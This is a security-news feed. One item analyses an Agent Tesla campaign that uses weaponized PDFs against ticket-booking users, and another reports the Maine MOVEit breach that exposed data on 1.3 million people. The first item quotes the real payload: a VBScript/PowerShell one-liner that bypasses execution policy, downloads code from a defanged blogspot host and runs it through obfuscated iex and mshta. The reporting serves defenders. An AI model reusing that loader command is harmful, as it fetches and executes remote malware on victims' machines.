Ukraine wages a war of attrition, the Kerch Strait Bridge is dropped again, and Russia seems to be purging its general officers. The FSB’s Gamaredon is showing renewed activity. Read More
The CyberWire
The all in one place for non-profit security aid.
Ukraine wages a war of attrition, the Kerch Strait Bridge is dropped again, and Russia seems to be purging its general officers. The FSB’s Gamaredon is showing renewed activity. Read More
The CyberWire
Hackers Attacking Online Ticket Booking Users Using Weaponized PDF Files
[[{“value”:”
Threat actors use weaponized PDF files to exploit software vulnerabilities, enabling them to execute malicious code on a target system.
PDFs provide a common and trusted format that makes them effective vehicles for delivering malware or launching phishing attacks.
Moreover, their ability to embed scripts and multimedia elements also increases the potential for exploitation.
Cybersecurity researchers at Forcepoint recently discovered that hackers actively attack online ticket-booking users using weaponized PDF files.
You can analyze a malware file, network, module, and registry activity with the ANY.RUN malware sandbox, and the Threat Intelligence Lookup that will let you interact with the OS directly from the browser.
New malware versions pop up daily, and authors keep innovating to spread it. In this tactic, threat actors lure users with attachments from various service providers.
In this new campaign, it’s been discovered that a PDF attachment that ends up downloading a RAT to infect the system is delivered via email.
Here below, we have presented the execution chain:-
Researchers analyzed PDFs for malicious attributes, and they used PDFiD for static analysis by scanning for keywords.
The pdf-parser reveals /ObjStm hiding scripts and URLs. While the PDF employs two methods for the next-stage payload:-
Fake pop-up triggers URL action [/URI/Type/Action/URI (hxxps://bit[.]ly/newbookingupdates)]. Redirects to hxxps://bio0king[.]blogspot[.]com/ for JavaScript payload download.
Embedded vbscript ExecuteGlobal code or JavaScript for direct final-stage remote PowerShell payload.
(vbscript:ExecuteGlobal(“CreateObject(“”WScript.Shell””).Run””powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25[.]blogspot[.]com//////////////atom.xml) | . (‘i*&*&&*x’).replace(‘*&*&&*’,’e’);Start-Sleep -Seconds 5″”,0:Close”))/F (\..\..\..\Windows\System32\mshta)>>”
PowerShell uses complex binary obfuscation and replaces the functions to hide and execute malicious scripts. It modifies registries, disables AMSI, adds AV exclusions, and bypasses security features.
The script alters the registry, services, and firewalls, and it also injects processes like Regsvcs.exe and MSbuild.exe.
It connects to “api[.]ipify[.]org” to steal data and send it to a private Telegram chat room. The script also downloads additional payloads from “htljan62024[.]blogspot[.]com” for persistence.
After operations, it drops and executes a {random-name}.dll file, then self-deletes.
Agent Tesla malware surged during the pandemic, and its evolving tactics have persisted in recent years. The campaign involves a PDF in a phishing email from a fake travel agency.
Opening the PDF triggers JavaScript, leading to a multi-stage PowerShell script with advanced obfuscation.
And the de-obfuscation reveals techniques for loading Agent Tesla malware. Meanwhile, successful infiltration enables data theft and command execution on compromised systems.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
The post Hackers Attacking Online Ticket Booking Users Using Weaponized PDF Files appeared first on Cyber Security News.
“}]] Read More
Cyber Security News
State of Maine data breach impacts 1.3 million people
The US State of Maine says it has suffered a data breach impacting around 1.3 million people. According to the census from July 2022, that’s more or less the the entire population of Maine.
The State of Maine says it was compromised via a known vulnerability in secure transfer service MOVEit Transfer. This vulnerability is known to be used by the Cl0p ransomware gang.
The type of stolen data varies from person to person, likely because the data breach affected multiple agencies in the State. More than 50% of the data exposed in the breach came from Maine’s Department of Health and Human Services, while between 10 and 30% came from the state’s Department of Education. The breach also impacted several other departments.
For what we can gather, the cybercriminals may have obtained names, Social Security numbers (SSN), dates of birth, driver’s licenses, state identification numbers, and taxpayer identification numbers. The stolen data may involve certain types of medical information and health insurance for some individuals.
Progress Software, who make MOVEit Transfer, issued a patch for the exploited vulnerability on May 31, 2023. However, the State of Maine says the cybercriminals gained access and started downloading files between May 28 and 29, 2023, before the patch was available.
The State of Maine is encouraging people to contact Maine’s dedicated call center to find out if their data was involved or if they have questions about this incident. The phone number is (877) 618-3659, with representatives available from Monday to Friday, 9 AM to 9 PM ET.
If your Social Security Number or taxpayer identification number is involved, the call center will provide you with a complimentary credit monitoring code which give you two years of credit monitoring and identity theft protection services.
If you suspect your data has been stolen, it’s worth watching out for people posing as the State of Maine. There’s nothing like a data breach to bring out the scammers, and they will be looking to target people affected by the breach. If someone does contact you, make sure to verifying they are who they say they are using another communication channel. Watch out for phishing emails, too.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your and your family’s personal information by using Malwarebytes Identity Theft Protection.
Malwarebytes